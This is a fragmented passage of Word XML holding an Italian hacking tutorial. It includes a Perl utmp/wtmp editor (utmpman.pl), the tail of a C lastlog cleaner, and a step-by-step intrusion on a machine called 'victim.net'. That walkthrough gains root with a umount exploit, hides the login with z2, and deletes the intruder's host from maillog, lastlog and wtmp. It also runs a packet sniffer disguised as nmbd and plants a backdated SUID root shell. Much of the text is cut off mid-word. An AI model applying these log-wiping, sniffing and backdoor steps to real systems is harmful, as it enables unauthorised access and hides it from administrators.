        <w:t>to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close(fp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close(fd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Entries stored: %d Entries removed: %d\n",cnt,to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Now chmod lastlog.tmp and copy over the original %s\n",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age(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Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST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h\tThis help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f\tUse FILE instead of default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a\tShow all entries found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u\tShow all entries for USER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rintf("\t-b\tShow NULL entries\n");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e\tErase USER completely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c\tErase all connections containing HOST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z\tShow ZAP'd entries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f("\t-x\tAttempt to remove ZAP'd entries completely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---------------------------- cut h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iste un buon perl script per editare utmp, wtmp, e controllare i process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n wted e' anche possibile inserire una linea. cosi' se vuoi giocare u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',puoi aggiungere clinton.whitehouse.gov loggato nella porta ttyp3 e far ved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e e' stato loggato per qualche or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acendo girare "check", saprai se qualcuno e' nel sistema e non si vede ne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tmp log. Alle volte gli amministratori si nascondono. In questo modo potra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edere se sono collegati. Devi essere root per far girare lo script e c'e'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isogno di perl 5.003+ sul sistema. Prima di far partire lo script vediam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help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i ci sono alcuni dei comandi bas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arts by loading w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lete user userna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lete host hostan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ead w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lete user userna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lete host hostna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ri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iama l'help per il res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start of utmpman.p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!/usr/bin/perl -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Variable defin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$utmp_location) = "/var/run/utmp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$wtmp_location) = "/var/log/wtmp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$shells_location) = "/etc/shells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$ttybase) = "tty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y($ttyrange) = "pqrs";                 # TTYrange standard on most linux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stem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y($ttyports) = "012345657689abcfef";   # TTYports standard on most linux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stem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Global initialization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$active_file) = "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%entries) = {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@cmdline) = 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y(@shells) = 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Display bann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 "\nutmp Manager v0.8\n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Access check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e("utmpman :: You must be root to run this application!\n") unless ($&gt; == 0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Read in valid shell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(defined($shells_location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open(SHELLFILE, "&lt;$shells_locatio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@shells = &lt;SHELLFILE&gt;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lose(SHELL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Process "basename" of each shell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@shells = map( { /([^\/\n]+)\n*$/; $1; } @shells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rint push(@shells) . " valid shells in $shells_location: @shells\n" if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(defined(@shells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eadfile("$utmp_locatio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t("\nutmpman: $active_file&gt; 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hile (&lt;STDIN&gt;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ocess_cmd(spli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("\nutmpman: $active_file&gt; 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process_cmd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if (!defined(@_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@line) = map { lc($_) } @_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_ = shift(@lin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WITCH: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/^check$/     &amp;&amp; do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check_func(@lin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last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>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/^delete$/    &amp;&amp; do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del_func(@lin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last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">};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/^help$/      &amp;&amp; do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help_func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 xml:space="preserve">last SWITCH;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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>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/^insert$/    &amp;&amp; do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ins_func(@lin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last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">};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/^list$/      &amp;&amp; do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list_func(@lin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last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>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/^read$/      &amp;&amp; do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read_func(@lin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last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>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/^write$/     &amp;&amp; do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write_func(@lin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lang w:val="it-IT"/>
        </w:rPr>
        <w:t>last SWITCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">};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/^quit|exit$/ &amp;&amp; exit(0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 xml:space="preserve"># DEFAULT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 xml:space="preserve">print ("Invalid command.\n");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HEL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help_func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&lt;&lt; "EOM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tmpManager Hel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te: - &lt;n&gt; is an argumen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- [id=] is a token which expects a value as part of comman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(ie, insert id=p5 user=root 11/23/96). See the insert comman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- A line is the full name to the tty port, ie ttyp0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- An id is the *unique* representation of the por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(without the tty, etc), ie "p0" (for ttyp0)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hec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- Perform user consistancy check. Use this to make sure that the data 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utmp agrees with who is actually on the machine. This is useful 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determining if a user is online with hidden ports, running nohup'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processes, or running iScree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delete &lt;x&gt;-&lt;y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- Delete entries #x to #y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delete host &lt;host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- Delete *all* entries which match the substring &lt;host&gt;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delete line|id &lt;line|id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- Delete entry containing &lt;line&gt; or &lt;id&gt;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nsert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime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- Insert an entry into utmp/wtmp files specifying any combinatio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of id/line, type, username, host, connection time, and logoff tim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(LogoffTime only valid for WTMP files.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list host &lt;host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- List all entries matching the substring &lt;host&gt;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list line|id &lt;line|id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- List all entries matching &lt;line&gt; or &lt;id&gt;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ad utmp|wtmp|&lt;filename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- Read entries from either default wtmp, default utmp, or an arbitra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filename. Note: arbitrary filenames MUST start with either "utmp" o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"wtmp" to be used with this editor. Rename files *outside* of thi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editor if necessary. If read is executed without any arguments, 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rereads the last given filename, which is displayed on the promp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write {filename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- Write entries to file {filename}. If write is executed without an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arguments, then entries will be written to the last given filename,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which is displayed on the promp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DELE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del_func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@params) = @_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!push(@_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("delete :: Not enough parameters. See \"help\" for syntax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 elsif ($params[0] =~ /host|user|id|line/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el_by_data(@_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 elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/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el_by_range($params[0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 elsif ($params[0] =~ m/^(\d+)$/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el_by_range("$1-$1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Renumber list after delete operatio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sync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del_by_rang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range)=shif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range =~ m/(\d+)*-(\d+)*/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lo, $hi, $count)=($1, $2, 0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lo = 0 if (!defined($lo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hi = scalar(keys(%entries)) if (!defined($hi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ort( { $a &lt;=&gt; $b } keys(%entries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($_ &gt;= $lo) &amp;&amp; ($_ &lt;= $hi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delete($entries{$_}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$cou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"$count entries deleted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}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del_by_data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op, $data) = @_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count) = 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(length($data) &lt; 5) &amp;&amp; ($op eq "host"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 "Must specify at least 5 characters for delete hostmask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 elsif (((length($data) &gt; 4) &amp;&amp; ($op eq "id"))||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((length($data) &gt; 11) &amp;&amp; ($op eq "line"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 "Invalid $op specified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Note: If we are deleting by user, then user must match, *exactly*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data = "^" . pack("a8", $data) . "\$" if ($op eq "user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ort( { $a &lt;=&gt; $b } keys(%entries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%{$entries{$_}}-&gt;{$op} =~ m/$data/i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delete($entries{$_}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++$coun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!$count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 "No $op entries matching $data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 els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 "$count entries deleted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INSER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Date1 Time1 = DateTime1 =&gt; mm/dd/[cc]yy[:hh:mm[:ss]]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Date2 Time2 = DateTime2 =&gt; (see abov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user=&lt;username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host=&lt;hostname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id=&lt;id&gt; | line=&lt;line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utmp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insert {id=|line=} [type=] [user=] [host=] [DateTime]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wtmp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insert {id=|line=} [user=] [host=] [DateTime1] {DateTime2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ins_func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%cmdopt)={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datetime1, $datetime2, $gmdate, $gmdate2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Get random pid out of the way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cmdopt{"pid"} = int(rand(32656)+100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cmdopt{"addr"} = pack("a4", "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Get command option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@_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/=/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local($key, $value)=split(/=/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$cmdopt{$key} = $value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 els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if (!defined($datetime1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$datetime1 = $_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nex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if (!defined($datetime2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$datetime2 = $_ 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nex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 xml:space="preserve">print "insert :: Invalid options specified. Please see \"help\" fo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ntax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Check for an illegal pair or illegal optio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keys(%cmdopt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!(/^host|id|line|type|user|addr$/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 xml:space="preserve">print "insert :: Invalid options specified. Please see \"help\" fo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ntax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($_ eq "last") &amp;&amp; ($active_file !~  m!/*utmp[^/]*$!i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print "insert :: LAST option only valid for utmp files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}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Get date in seconds since 1970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gmdate = SecsSince1970($datetime1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Get ending date in seconds since 1970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gmdate2 = SecsSince1970($datetime2) if (defined($datetime2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!defined($gmdate) || (!defined($gmdate2) &amp;&amp; defined($datetime2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 "insert :: Invalid date specified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defined($gmdate2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$gmdate2 &lt; $gmdate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 xml:space="preserve">print "insert :: First date/time must be *later* than secon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te/time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defined($cmdopt{"id"}) &amp;&amp; defined($cmdopt{"line"}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 "insert :: Insert by LINE or ID only. Please do not specify both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op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!defined($cmdopt{"id"}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cmdopt{"id"} = $cmdopt{"line"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op = "line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if (!($cmdopt{"id"} =~ s/^$ttybase//)) {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 xml:space="preserve">print "insert :: Invalid line specified.\n";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 xml:space="preserve">return undef;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 els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cmdopt{"line"} = $ttybase . $cmdopt{"id"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op = "id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}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!(defined($cmdopt{"line"}) || defined($cmdopt{"id"}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print "insert :: Neither LINE nor ID value found. See \"help\" fo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ntax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my($searchdata) = ($active_file =~ m!/*utmp[^/]*$!i) ?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(pack(($op eq "line") ? "a12" : "a4", $cmdopt{$op})):$cmdopt{$op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epos1, $npos1, $epos2, $npos2) = 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oldpos, $count)=("", 0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ort( { $a &lt;=&gt; $b } keys(%entries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$active_file =~ m!/*utmp[^/]*$!i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# Handle utmp insertion by line insertio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if (%{$entries{$_}}-&gt;{$op} eq $searchdata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printf ("insert :: $op $searchdata already exists at position $_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# This needs to check every option in %cmdopt for defined or null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$count = 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foreach (qw(user host time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if (defined($cmdopt{$_}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$count++ if ($cmdopt{$_} ne "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if (!$count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printf ("insert :: No other data specified. Entry unchanged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las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 els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# Handle wtmp insertion by time position. (Messy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$epos1 = $oldpos if (defined($npos1) &amp;&amp; !defined($epos1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$npos1 = $_ if (%{$entries{$_}}-&gt;{"time"} &gt; $gmdat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last if (!defined($gmdate2) &amp;&amp; defined($epos1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 xml:space="preserve">$epos2 = $oldpos if (defined($npos2));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$npos2 = $_ if (%{$entries{$_}}-&gt;{"time"} &gt; $gmtime2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last if (defined($epos2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oldpos = $_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Set any unspecified default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cmdopt{"user"} = pack("a8", "")  if !defined($cmdopt{"user"}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cmdopt{"host"} = pack("a16", "") if !defined($cmdopt{"host"}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cmdopt{"type"} = 7               if !defined($cmdopt{"type"}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Determine end of list insertion positions. (IE, dates entered are aft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dates in wtmp file or line/id not found in utmp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epos1 = (scalar(keys(%entries)) + 1) if (!defined($npos1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defined($datetime2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epos2 = (scalar(keys(%entries)) + 1) if (!defined($npos2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++$epos2 if (defined($gmtime2) &amp;&amp; !defined($npos1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Parse insert data and insert entry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epos1 = sprintf("%7.3f", ($npos1 - $epos1)/2) if (defined($npos1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epos2 = sprintf("%7.3f", ($npos2 - $epos2)/2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defined($npos2) &amp;&amp; defined($gmdate2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Insert first entry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$cmdopt{"time"} = $gmdate;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@{$entries{$epos1}}{qw(type pid line id time user host addr)} =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@{%cmdopt}{qw(type pid line id time user host addr)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defined($epos2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cmdopt{"user"} = pack("a8", "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cmdopt{"host"} = pack("a16","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cmdopt{"id"}   = pack("a4", "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cmdopt{"time"} = $gmdate2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@{$entries{$epos2}}{qw(type pid line id time user host addr)} =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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>@{%cmdopt}{qw(type pid line id time user host addr)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sync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LI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list_func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@params) = @_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!push(@_) || ($params[0] eq "all"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ist_by_range("-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 elsif ($params[0] =~ /^host|user|id|line$/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ist_by_data(@_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 elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/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ist_by_range($params[0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 elsif ($params[0] =~ m/^(\d+)$/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ist_by_range("$1-$1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("list :: Error in parameters. See \"help\" for syntax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}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list_by_data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op, $data) = @_; my($count) = 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ort( {$a &lt;=&gt; $b} keys(%entries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%{$entries{$_}}-&gt;{$op} =~ m/$data/i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list_entry($_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++$coun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"No $op entries matching $data.\n" if (!$coun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list_by_rang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range)=shif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range =~ m/(\d+)*-(\d+)*/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lo, $hi)=($1, $2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lo = 0 if (!defined($lo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hi = scalar(keys(%entries)) if (!defined($hi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ort( { $a &lt;=&gt; $b } keys(%entries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($_ &gt;= $lo) &amp;&amp; ($_ &lt;= $hi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list_entry($_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}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list_entry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f("#%3d - " . gmtime(%{$entries{$_}}-&gt;{"time"}), $_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f("  %s/%s", @{$entries{$_}}{qw(id line)}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f(": %s ", %{$entries{$_}}-&gt;{"user"}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%{$entries{$_}}-&gt;{"user"} ne pack("a8", ""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printf("from %s", %{$entries{$_}}-&gt;{"host"})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%{$entries{$_}}-&gt;{"host"} ne pack("a16", ""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%{$entries{$_}}-&gt;{"addr"} ne "\0\0\0\0"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f(" (%s)", longtodot4(%{$entries{$_}}-&gt;{"addr"}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("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printf("%7sPID = %u\n", "", %{$entries{$_}}-&gt;{"pid"})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if (%{$entries{$_}}-&gt;{"pid"} &amp;&amp; (%{$entries{$_}}-&gt;{"user"} n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ck("a8","")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# &lt;Silmaril&gt; printf "#$_ - %s %s/%s: %s from %s\n", @{$v}-&gt;{qw(time id line us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ost)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&lt;Silmaril&gt; now *that's* cool :-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&lt;Silmaril&gt; should be like this: @{$v}{qw(time id line user host)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&lt;Silmaril&gt; I had an extra -&gt; in my first versio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Or course, it's changed since then, but - "Thanks, Sil!" :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REA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read_func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arg)=shif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arg = $utmp_location if ($arg eq "utmp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arg = $wtmp_location if ($arg eq "wtmp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arg = $active_file if (!defined($arg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$arg !~ m!/*[uw]tmp[^/]*$!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print("read :: Filenames *must* start with either 'wtmp' or 'utmp' to b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dited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adfile($arg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WRI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write_func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file)=shif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count)=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file = $active_file if (!defined($file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$file !~ m!/*[uw]tmp[^/]*$!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print ("write :: File must start with 'utmp' or 'wtmp'.\nRename file outsid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is program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!open(OUTFILE, "&gt;$file"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 ("write :: Can't open $file for output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binmode(OUT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ort( { $a &lt;=&gt; $b } keys(%entries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printf OUTFILE ("%s", pack("i L a12 a4 L a8 a16 a4"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@{$entries{$_}}{qw(type pid line id time user host addr)}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cou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("$active_file: " . scalar(keys(%entries)) . " entries written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lose(OUT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}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CHEC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check_func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push(@_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 "check :: Invalid options specified. Please see \"help\"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$active_file !~ m!/*utmp[^/]*$!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rint "check :: Command can only be run on utmp files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Build struct of ports containing port name, device num and own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Note: Test run in grepstr may *not* be portable for all Uni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      types. Be forewarned! This was designed for Linux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Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$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      should return the same as what you expect in "struct utmp-&gt;ut_id"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grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$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%ports) = {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user, $rdev) = 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opendir(DEVDIR, "/dev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@devfiles) = readdir(DEVDIR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@devfiles = grep(/$grepstr/, @devfiles);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lose(DEVDIR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@devfiles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/^$ttybase([$ttyrange][$ttyports])$/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!defined($1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print "check :: Warning! Could not extract port ID from $_.\n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 els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($user, $rdev) = (stat("/dev/$_"))[4, 6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$user = getpwuid($user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$ports{$1} = newport($_, $rdev, $user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}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Check ownership of /dev port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@logdev)=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ort(keys(%ports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push(@logdev, $_) if (%{$ports{$_}}-&gt;{"owner"} ne "root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@logdev = sort(@logdev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Check utmp (against ports detected as logged in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@logutmp)=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ort( { $a &lt;=&gt; $b } keys(%entries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if (defined(%{$entries{$_}}-&gt;{"user"}) &amp;&amp; defined(%{$entries{$_}}-&gt;{"host"})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&amp;&a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 xml:space="preserve">defined(%{$entries{$_}}-&gt;{"id"})   &amp;&amp; defined(%{$entries{$_}}-&gt;{"pid"}))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 xml:space="preserve">push(@logutmp, %{$entries{$_}}-&gt;{"id"})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if ((%{$entries{$_}}-&gt;{"id"} =~ /[$ttyrange][$ttyports]/) &amp;&a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((%{$entries{$_}}-&gt;{"user"} ne pack("a8", "")) ||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((%{$entries{$_}}-&gt;{"host"} ne pack("a16", "")) &amp;&a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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(%{$entries{$_}}-&gt;{"id"} ne pack("a4", "")) &amp;&a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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(%{$entries{$_}}-&gt;{"line"} ne pack("a12", "")) &amp;&a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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(%{$entries{$_}}-&gt;{"pid"} &gt; 0))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@logutmp = sort(@logutmp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Check PIDs (find processes with active port ids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opendir(PIDDIR, "/proc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%processes) = {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@portprocesses) = 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grep(/\d+/, readdir(PIDDIR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local($procdata, $cmdlin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open(PROCFILE, "&lt;/proc/$_/stat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procdata = &lt;PROCFILE&gt;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close(PROC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-e "/proc/$_/stat"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local($cmdline, $devnum, $portid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($cmd, $devnum) = (split(/ /, $procdata))[1, 6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# Remove surrouding () from command nam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$cmd =~ s/[\(\)]//g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$portid = dev2id(\%ports, $devnum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if (defined($portid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push(@portprocesses, $portid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if (!defined(listpos(\@portprocesses, $portid))&amp;&amp;($$ != $_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 xml:space="preserve">$processes{$_} = newproc($cmd, $portid) if (defined($portid) &amp;&amp; ($$ !=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_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lose(PIDDIR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A port is *not* logged in if there is no dev entry for port, no utmp ent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and no active process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@validshellports) = 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ort( { $a &lt;=&gt; $b} keys(%processes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push(@validshellports, %{$processes{$_}}-&gt;{"port"})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if (defined(listpos(\@shells, %{$processes{$_}}-&gt;{"cmd"}))&amp;&a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!defined(listpos(\@validshellports, %{$processes{$_}}-&gt;{"port"})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Remove ports with valid shells from list of ports with active process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my(@noshellports) =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sort(grep(!defined(listpos(\@validshellports, $_)), @portprocesses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@validshellports = sort(@validshellports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"Ports with active /dev files: @logdev\n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defined(@logdev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"Ports with utmp entries: @logutmp\n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defined(@logutmp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print "Ports with valid shells: @validshellports\n"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defined(@validshellports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print "Ports with active processes and *no* shells: @noshellports\n"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 (defined(@noshellports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}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GENERA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readfil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local($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file = shif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index)=1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buffer)="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Insure we have a clean hash table before we start reading in the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keys(%entries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ndef(%{$entries{$_}}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elete(${entries{$_}}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open(UTMPFILE, "&lt;$file") || die("utmp-parse: Can't open $file - $!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binmode(UTMP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# 1/17/96, struct utmp is 56 bytes (54 according to addition! :P).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while (read(UTMPFILE, $buffer, 56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entries{$index++} = newutmp($buffer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active_file = $file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("$active_file: " . scalar(keys(%entries)) . " entries loaded.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lose(UTMP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newutmp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newbuff) = shif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longaddr) = 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$newnode = bless {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"type" =&gt; undef, "pid" =&gt; undef,  "line" =&gt; undef, "id"   =&gt; undef,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"time" =&gt; undef, "user" =&gt; undef, "host" =&gt; undef, "addr" =&gt; unde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, 'UTMPNODE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@{$newnode}{qw(type pid line id time user host addr)}=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unpack("i L a12 a4 L a8 a16 a4", $newbuff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$newnode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}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newport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newnode = bless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"port" =&gt; undef, "rdev" =&gt; undef, "owner" =&gt; undef, "cmd" =&gt; undef,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, 'PORTNODE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@{$newnode}{qw(port rdev owner)} = @_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$newnode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newproc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newnode = bless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"cmd" =&gt; undef, "port" =&gt; undef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, 'PROCNODE'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@{$newnode}{qw(cmd port)} = @_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$newnode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Renumber hashes to default ord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resync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%newhash) = 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count)=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Write ordered list in to temporary hash, deleting as we g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ort( {$a &lt;=&gt; $b} keys(%entries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newhash{++$count} = $entries{$_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elete($entries{$_}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Copy elements back in to original hash tab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ort( {$a &lt;=&gt; $b} keys(%newhash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entries{$_} = $newhash{$_}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longtodot4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addr)=shif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join(".", map( ord($_), split(//, $addr)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dev2id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portlist, $rdev) = @_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sort(keys(%{$portlist})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$_ if (%{$portlist}-&gt;{$_}-&gt;{"rdev"}==$rdev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}                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listpos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arrayref, $search) = @_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count) = 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^W = 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each (@{$arrayref}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return $count if ($search eq ${$arrayref}[$count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count++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^W = 1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## DATE ROUTIN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The following code taken &amp; modified from the Date::Manip packag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Here is his copyright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# Copyright (c) 1995,1996 Sullivan Beck. All rights reserve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# This program is free software; you can redistribute it and/or modify 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# under the same terms as Perl itself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SecsSince1970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Parse as mm/dd/[cc]yy[:hh:mm[:ss]]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datetime) = shif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m,$d,$y,$h,$mn,$s) = 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If date is not defined, then return local current date and tim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time() if (!defined($datetime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$datetime =~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s!^(\d{1,2})/(\d{1,2})/(\d{4}|\d{2})(?:\:(\d{2}):(\d{2})(?:\:(\d{2}))?)?!!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($m, $d, $y, $h, $mn, $s) = ($1, $2, $3, $4, $5, $6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m--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Finalize time components and check them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$y = (($y &lt; 70) ? "20":"19" . $y) if (length($y)==2);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This checks for any *non-matched* portion of $datetime. If there is suc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an animal, then there is illegal data specified. Also screens for undefin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components which HAVE to be in ANY valid date/time (ie, month, day, year)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return undef if (!defined($m) || !defined($d) || !defined($y) ||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ength($datetime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Set time components with unspecified valu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s = 0 if (!defined($s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mn = 0 if (!defined($mn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h = 0 if (!defined($h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Check for rang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undef if (($m &gt; 11)    || ($h &gt; 23)    || ($mn &gt; 59)   || ($s &gt; 59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Begin conversion to seconds since 1/1/70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sec_now,$sec_70)=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sec_now=DaysSince999($m,$d,$y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undef if (!defined($sec_now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sec_now--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sec_now = $sec_now*24*3600 + $h*3600 + $mn*60 + $s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sec_70 =3061022400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($sec_now-$sec_70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DaysSince999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m,$d,$y)=@_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Ny,$N4,$N100,$N400,$dayofyear,$days)=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cc,$yy)=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y=~ /^(\d{2})(\d{2})$/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($cc,$yy)=($1,$2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Number of full years since Dec 31, 0999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Ny=$y-100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Number of full 4th years (incl. 1000) since Dec 31, 0999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N4=int(($Ny-1)/4)+1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N4=0         if ($y==1000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Number of full 100th years (incl. 1000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N100=$cc-9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N100--       if ($yy==0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Number of full 400th year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N400=int(($N100+1)/4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Check to insure that information returns a valid day of yea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dayofyear=dayofyear($m,$d,$y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undef if (!defined($dayofyear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Compute day of yea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days= $Ny*365 + $N4 - $N100 + $N400 + $dayofyear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$days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b dayofyear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m,$d,$y)=@_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@daysinmonth)=(31,28,31,30,31,30,31,31,30,31,30,31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y($daynum,$i)=(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daysinmonth[1]=29  if (!($y % 4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Return error if we are given an invalid dat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undef if ($d &gt; $daysinmonth[$m]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daynum=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or ($i=1; $i&lt;$m; $i++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$daynum += $daysinmonth[$i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daynum += $d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 $daynum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# END DATE ROUTIN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End of scrip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 end of utmpman.p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V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liminare i file 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6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 giro in un sistema hackat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n finiremo mai di dirtelo! Pulisci, Pulisci!!! In questa sezione ti porterem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 un sistema e ti mostreremo alcune basi su come cercare e come eliminare l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ua presenza dal sistema. Per iniziare loggiamoci in un sistem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 --&gt; guarda chi c'e' nella macchin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/home/master]finger @victim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victim.net]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 one logged o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 --&gt; Ok non c'e' nessuno, possiamo loggarc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/home/master]telnet victim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ying xxx.206.xx.140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nected to victim.ne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cape character is '^]'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elcome to Victim Research Linux (http://www.victim.net) Red Hat 2.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Kernel 1.2.13 on a i586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s.victim.net login: jnsmit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word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inux 1.2.13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You have new mail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&gt; Non leggere la sua mail, puoi vederle tutte in /var/spool/ma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 xml:space="preserve">e in ogni directory /home/username/mail dell'utent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&gt; Controlla ancora se c'e' qualcun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jnsmith]$ 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5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.0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er     tty       login@  idle   JCPU   PCPU  wha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nsmith   ttyp1     5:35am                      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&gt; Solo noi ok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jnsmith]$ cd .ter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&gt; bel posto dove nascondere i nostri stuff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.term]$ ./.u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usiamo umounc.c explo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&gt; Adesso siamo root, usiamo z2 per diventare invisibil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z2 jnsmit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Zap2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Vediamo se ci siamo ancora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5:37am  up 18 days,  8:24,  0 users,  load average: 0.08, 0.02, 0.0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er     tty       login@  idle   JCPU   PCPU  wha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Hmm. adesso non c'e' nessuno nel sistema, devo essermi scollegato :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Sappiamo che siamo root ma assicuriamoci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whoam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Yup, root... In che directory siamo?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pw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home/jnsmith/.ter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Controlliamo i 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cd /var/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il piu' delle volte in /var/adm, in quasto box /var/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grep dormroom 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aillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from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rmroom.playhouse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aillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from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rmroom.playhouse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Yup, z2 si preoccupa di tutto ma questi maillog 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pico mail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in pico ho fatto un ctrl w, ho cercato dormroom quindi ctrl k p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cancellare le line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Queste sono le linee cancella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an 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse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an 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse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grep dormroom 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Yup, tutto cancellato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5:41am  up 18 days,  8:27,  0 users,  load average: 0.00, 0.00, 0.0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er     tty       login@  idle   JCPU   PCPU  wha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Yup, ho cancellato tutto anche qui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Adesso ti mostro come usare lled e wted se il grep avess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mostrato qualcosa in questi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cd ~jnsmith/.ter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l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led -c dormroom.playhous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ntries stored: 527 Entries removed: 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desso chmod lastlog.tmp e copialo sopra l'originale /var/log/last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Niente in last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wted -e jnsmit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ntries stored: 254 Entries removed: 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desso chmod wtmp.tmp e copialo sopra l'originale /var/log/w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-&gt; Niente in w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-&gt; Facciamo un po' di sniffin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pico linsniffer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-&gt; Ho cambiato queste linee per dirgli dove voglio far andare i log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define TCPLOG "/tmp/.pinetemp.000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-&gt; guardiamo cosa sta girando su questa macchina per pensare ad u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ab/>
        <w:t xml:space="preserve">     nome che possa apparire simile a quelli qui sott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ps -au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  143  0.0  0.0   84    0  ?  SW  Jan 10   0:01 (lpd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  154  0.0  0.0  118    0  ?  SW  Jan 10   0:00 (smbd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  163  0.0  0.5   76  176  ?  S   Jan 10   0:00 nmbd -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  197  0.0  0.0   76    0 v03 SW  Jan 10   0:00 (getty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  198  0.0  0.0   76    0 v04 SW  Jan 10   0:00 (getty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  199  0.0  0.0   76    0 v05 SW  Jan 10   0:00 (getty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  200  0.0  0.0   76    0 v06 SW  Jan 10   0:00 (getty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  201  0.0  0.0   88    0 s00 SW  Jan 10   0:00 (uugetty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  209  0.0  0.2   35   76  ?  S   Jan 10   0:01 (update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  210  0.0  0.3   35  124  ?  S   Jan 10   0:03 update (bdflush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10709  0.0  1.4  152  452  ?  S   Jan 27   0:10 http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11111  0.0  1.4  152  452  ?  S   Jan 27   0:07 http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14153  0.0  0.8   70  268  ?  S   Jan 16   0:03 ./inet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14307  0.0  4.7 1142 1484  ?  S   Jan 16   1:16 ./nam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14365  0.0  0.0   76    0 v02 SW  Jan 16   0:00 (getty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    17367  0.0  1.4  152  452  ?  S    11:01   0:02 http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-&gt; compiliamolo e chiamiamolo nmb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gcc linsniffer.c -o nmb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carichiamolo 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nmb&amp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1] 2217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controlliamo il log file in /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cd /t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 -al .pin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otal 1569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w-r--   1 root     jnsmith          0 Jan 29 05:50 .pinetemp.00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c'e' ma non vogliamo che appaia la nostra log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chgrp root .pin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vediamo adesso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 -al .pin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w-r--   1 root     root            0 Jan 29 05:50 .pinttemp.00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cosi' va meglio, creiamo una SUID shell in modo da non rifa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questo casino ancora.(controlla MD5 o altri prg nel cron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cd /b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 -l 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rwxrwxrwx   1 root     root            4 Mar  1  1996 sh -&gt; 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questo e' un sym link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 -l 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xr-xr-x   1 root     root       299296 Nov  2  1995 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questo e' un file reale ... vediamo come chiamarlo in modo ch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sembri uno di ques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rch           df             ksh            ping           ta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sh            dmesg          ln             ps             tc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           dnsdomainname  login          pwd            tru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t            domainname     ls             red            ttysnoop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grp          echo           mail           rm             um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mod          ed             mkdir          rmdir          una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own          false          mknod          sed            v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p             findterm       more           setserial      vie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pio           gunzip         mount          sh             vi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sh            gzip           mt             stty           zca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te           hostname       mv             su             z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d             kill           netstat        syn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Lo chiameremo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cp bash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ok, adesso andiamo a dare un'occhiata al nostro nuovo comando uni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 -l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xr-xr-x   1 root     jnsmith     299296 Jan 29 05:59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Dobbiamo cambiare il proprietario del gruppo, cambiare la data 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>farlo SUI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chgrp root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 -l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xr-xr-x   1 root     root       299296 Jan 29 05:59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chmod +s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 -l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sr-sr-x   1 root     root       299296 Jan 29 05:59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touch -t 111312331995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 -l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sr-sr-x   1 root     root       299296 Nov 13  1995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 -l m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xr-xr-x   1 root     root        64400 Oct 31  1995 ma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xr-xr-x   1 root     root         7689 Nov  2  1995 mkdi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xr-xr-x   1 root     root         7001 Nov  2  1995 mkno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xr-xr-x   1 root     root        20272 Nov  1  1995 mo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sr-xr-x   1 root     root        26192 Nov  1  1995 mou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xr-xr-x   1 root     root         8381 Oct 31  1995 m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xr-xr-x   1 root     root        12753 Nov  2  1995 mv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Adesso sembra tuto ok e vediamo se ci fornisce l'accesso di root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 xml:space="preserve">    Usciamo dal sistema...  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ex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.term]$ cd /b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/bin]$ whoam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nsmit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/bin]$ findho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/bin]# whoam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/bin]# c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cd {enter} ci fa ritornare nella hom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jnsmith]# l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jnsmith]# echo + +&gt;te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jnsmith]# ls -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otal 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------   2 jnsmith   jnsmith       1024 Jan 11 22:47 ma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w-r--   1 root      root            4 Jan 29 06:11 te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Adesso abbiamo uid=0 e gid=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jnsmith]# rm te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puliamo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jnsmith]# w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6:12am  up 18 days,  8:58,  